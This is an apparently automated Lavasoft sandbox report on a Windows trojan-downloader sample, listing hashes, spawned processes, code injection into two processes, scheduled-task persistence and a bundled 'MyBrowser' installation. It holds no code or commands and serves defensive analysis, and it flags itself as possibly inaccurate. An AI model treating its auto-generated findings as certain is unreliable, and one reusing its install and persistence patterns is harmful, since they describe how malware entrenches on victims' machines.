Trojan-Downloader.Win32.Genome.sxuj (Kaspersky), Trojan.NSIS.StartPage.FD, Trojan.Win32.Swrort.3.FD, mzpefinder_pcap_file.YR, GenericInjector.YR (Lavasoft MAS)
Behaviour: Trojan-Downloader, Trojan
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: f90f8d317708fadfed5349db278545ea
SHA1: 3cdeb2369fd132d5b653026003bd0c09970a5591
SHA256: 121f71089682c237aa66943e4f19104c52d4113558ea01073995fdd20bf13d34
SSDeep: 6144:5zffoUzv5wCyfy4Uq9qFJ22uKjJqmoLosIo9jas/Q3NuBuV27xeWhPAG1RJ2TcFT:GUreCM9mJ2254to6aAQ3oB027F5oTneZ
Size: 274102 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2009-12-06 00:50:35
Analyzed on: WindowsXP SP3 32-bit
Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
nsq18.tmp:1164
6471.exe:1916
chrome.exe:2304
chrome.exe:2268
chrome.exe:2216
chrome.exe:1980
chrome.exe:2252
nsq21.tmp:168
nso13.tmp:508
6481.exe:1988
tmp25.tmp:3448
setup.exe:576
setup.exe:240
tmp24.tmp.exe:1492
nsj1B.tmp:1648
dwwin.exe:2404
nsu5.tmp:468
nssF.tmp:1668
%original file name%.exe:1364
FlashPlayerUpdateService.exe:3536
The Trojan injects its code into the following process(es):
avg23.exe:1836
adv_128.exe:1660
Mutexes
The following mutexes were created/opened:
No objects were found.
File activity
The process nsq18.tmp:1164 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\6471.exe (14988 bytes)
The process 6471.exe:1916 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\ikea.ico (2993 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\ebay.ico (55 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\msn.ico (36 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\bing.ico (1597 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\pinterest.ico (39 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\tumblr.ico (40 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\utility.exe (14988 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M16JSLQR\ie.zip[1].002 (3985887 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\linkedin.ico (37 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\msn.ico (1588 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\groupom.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\ebay.ico (1913 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\netflix.ico (1909 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\youtube.ico (3913 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\etsy.ico (3913 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\imdb.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\search.ico (1917 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\espn.ico (36 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\gizmodo.ico (601 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\amazon.ico (601 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\cnn.ico (45 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\kayak.com.ico (1601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\google_news.ico (2993 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\google_translate.ico (1592 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\nba.ico (1601 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\gmail.ico (47 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M16JSLQR\ie.zip[1].001 (3985887 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\bing.ico (42 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M16JSLQR\ie.zip[1].003 (3985887 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M16JSLQR\ie.zip[1].004 (3985887 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M16JSLQR\ie.zip[1].005 (3985887 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\walmart.ico (1601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\cnn.ico (1601 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\bbc.ico (35 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\etsy.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\chrome.packed.7z (1304956 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\huffingtonpost.ico (49 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\ted.ico (57 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\weather_channel.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\icon.json (21 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\twitter.ico (1588 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\google_plus.ico (64 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\ted.ico (1913 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\netflix.ico (51 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\facebook.ico (3913 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\priceline.ico (53 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\reddit.ico (1917 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\bestbuy.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\espn.ico (1588 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\twitter.ico (36 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\QXGRCP0F\ipgeoapi[1] (40 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\forbes.ico (1592 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\walmart.ico (48 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\bbc.ico (1588 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\google_news.ico (601 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\agoda.ico (61 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\target.ico (50 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\yahoo_finance.ico (2993 bytes)
%WinDir%\Tasks\MyBrowser.job (1966 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\wikipedia.ico (1913 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\9gag.ico (56 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\yahoo_finance.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\yandex.ico (1588 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\youtube.ico (601 bytes)
%WinDir%\Tasks\63266ED-96F7-4DEF-A2CE-178BD4AA43E.job (1644 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\agoda.ico (1921 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\yelp.ico (1597 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\gmail.ico (1601 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\yahoo_search.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\imdb.ico (2993 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\hotels.com.ico (1601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\weather_channel.ico (5593 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\nytimes.ico (1921 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\google_translate.ico (38 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\reddit.ico (60 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\mail.ru.ico (49 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\mail_live_msn.ico (1592 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\theguardian.ico (1597 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\forbes.ico (40 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\linkedin.ico (1592 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\expedia.ico (1921 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\expedia.ico (61 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\wikipedia.ico (55 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\target.ico (1909 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\hotels.com.ico (47 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\search.ico (57 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\icon.json (9 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\nba.ico (48 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\yahoo_mail.ico (1913 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\booking.com.ico (45 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\gizmodo.ico (2993 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\theguardian.ico (42 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\mail_live_msn.ico (38 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\pinterest.ico (1592 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\skype.ico (44 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\kayak.com.ico (47 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\yahoo_mail.ico (56 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\yahoo_search.ico (5593 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\crbrw.zip (313192 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\yelp.ico (42 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\google_plus.ico (1921 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\yahoo.ico (39 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\9gag.ico (1913 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\tripadvisor.ico (58 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\huffingtonpost.ico (1909 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\bestbuy.ico (3913 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\tripadvisor.ico (1917 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\ikea.ico (601 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\nfl.ico (56 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\priceline.ico (1913 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\facebook.ico (601 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\yandex.ico (35 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\nytimes.ico (61 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\skype.ico (1597 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\amazon.ico (2993 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\nfl.ico (1913 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\prefs (823 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\tumblr.ico (1592 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\yahoo.ico (1592 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\setup.exe (37305 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\groupom.ico (2993 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\63266ED-96F7-4DEF-A2CE-178BD4AA43E\63266ED-96F7-4DEF-A2CE-178BD4AA43E.exe (14988 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\chrome.dat (31 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\booking.com.ico (1601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\mail.ru.ico (1909 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\crbrw.zip (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\63266ED-96F7-4DEF-A2CE-178BD4AA43E\63266ED-96F7-4DEF-A2CE-178BD4AA43E.exe (0 bytes)
%WinDir%\Tasks\63266ED-96F7-4DEF-A2CE-178BD4AA43E.job (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\63266ED-96F7-4DEF-A2CE-178BD4AA43E (0 bytes)
The process chrome.exe:1980 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\Default\30.tmp (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\etilqs_KyoUMYnZgcIULmW (286 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\Default\27.tmp (38 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\Default\Favicons (4342 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\Default\2C.tmp (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\2D.tmp (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\Default\GCM Store\LOG (161 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\Default\README (170 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\Default\Favicons-journal (532 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\etilqs_yOentjedkNlWMUS (532 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\Default\32.tmp (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\Default\Visited Links (284 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\Default\Cache\index (368 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\Default\31.tmp (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\26.tmp (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\Default\History (21181 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\etilqs_r6aGBN8ReJ2GMKt (286 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\Default\Cache\data_2 (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\Default\Top Sites-journal (12948 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\Default\GCM Store\000001.dbtmp (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\Default\2B.tmp (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\Default\Web Data (22997 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\Default\2E.tmp (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\Default\Cache\data_1 (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\Default\Cache\data_0 (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\Default\Cache\data_3 (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\Default\History-journal (4756 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\Default\GCM Store\MANIFEST-000001 (75 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\Default\2A.tmp (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\Default\28.tmp (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\Default\Web Data-journal (1580 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\Default\29.tmp (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\etilqs_sUlVw20TbJznEkx (532 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\First Run (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\7db7_appcompat.txt (13516 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\Default\Top Sites (5232 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\Default\2F.tmp (5 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\Default\Preferences~RF8d55a.TMP (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\Default\Preferences~RFa48ef.TMP (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\Default\Preferences~RF998e8.TMP (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\Default\Preferences~RF92399.TMP (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\Default\Preferences~RF8fc79.TMP (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\Default\Preferences~RF9e728.TMP (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\Default\Preferences~RF94ab9.TMP (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\Default\Preferences~RFa21cf.TMP (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\Default\Preferences~RF9bff8.TMP (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\Local State~RF98531.TMP (0 bytes)
The process nsq21.tmp:168 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\avg23.exe (43108 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\UNWRK3K5\SilentInstaller_dotnet4[1].exe (162513 bytes)
The process nso13.tmp:508 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsf16.tmp (5641 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsp15.tmp (0 bytes)
The process tmp25.tmp:3448 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%System%\Macromed\Flash\FlashInstall.log (2 bytes)
%System%\FlashPlayerApp.exe (3851 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{1D1DE627-D4CD-4E9A-80D7-51811AD15DE3}\fpb.tmp (1779 bytes)
%System%\Macromed\Flash\pepflashplayer32_18_0_0_209.dll (121304 bytes)
%System%\Macromed\Flash\manifest.json (2 bytes)
%System%\Macromed\Flash\pepper.vch (1697 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{482CAC4F-435A-482E-9515-A215A670DE60}\fpb.tmp (7386 bytes)
%System%\Macromed\Flash\FlashPlayerUpdateService.exe (268 bytes)
%System%\FlashPlayerCPLApp.cpl (142 bytes)
%System%\Macromed\Flash\FlashUtil32_18_0_0_209_pepper.exe (7386 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\{482CAC4F-435A-482E-9515-A215A670DE60}\fpb.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{482CAC4F-435A-482E-9515-A215A670DE60} (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{1D1DE627-D4CD-4E9A-80D7-51811AD15DE3}\fpb.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{1D1DE627-D4CD-4E9A-80D7-51811AD15DE3} (0 bytes)
The process setup.exe:576 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\secondarytile.png (3 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\tr.pak (220 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\MyBrowser\MyBrowser.lnk (1 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\nacl_irt_x86_32.nexe (15801 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\ar.pak (293 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\te.pak (1761 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\pl.pak (220 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Extensions\external_extensions.json (103 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\ko.pak (228 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\lv.pak (225 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\ffmpegsumo.dll (6337 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\da.pak (206 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\VisualElementsManifest.xml (392 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\nacl_irt_x86_64.nexe (20507 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\VisualElements\logo.png (5 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\ja.pak (266 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe (5873 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\pt-BR.pak (217 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\fr.pak (239 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\ca.pak (227 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\icudtl.dat (76792 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\hr.pak (214 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\chrome_100_percent.pak (7386 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\de.pak (224 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\chrome_200_percent.pak (7972 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\he.pak (253 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\fil.pak (228 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\wow_helper.exe (67 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\libegl.dll (204 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\pt-PT.pak (222 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\ml.pak (1826 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\ru.pak (1612 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\nl.pak (216 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\metro_driver.dll (1765 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\cs.pak (223 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\pdf.dll (67091 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\chrome_elf.dll (125 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\VisualElements\smalllogo.png (9 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\PepperFlash\pepflashplayer.dll (122658 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\lt.pak (221 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\master_preferences (814 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\et.pak (201 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\ro.pak (228 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\delegate_execute.exe (12288 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\MyBrowser.lnk (1 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\hu.pak (235 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\mybrowser.exe (3869 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\39.5.2171.95.manifest (222 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\gu.pak (1705 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\chrome_child.dll (261193 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin (4 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\it.pak (220 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\d3dcompiler_46.dll (22433 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\fi.pak (213 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\mr.pak (1708 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\vi.pak (247 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\sr.pak (1610 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\am.pak (302 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\zh-CN.pak (187 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\39.5.2171.95\Installer\chrmstp.exe (6841 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\es.pak (230 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\chrome.dll (237340 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\resources.pak (121304 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\zh-TW.pak (190 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\bn.pak (1731 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\VisualElements\splash-620x300.png (11 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\th.pak (1702 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\id.pak (202 bytes)
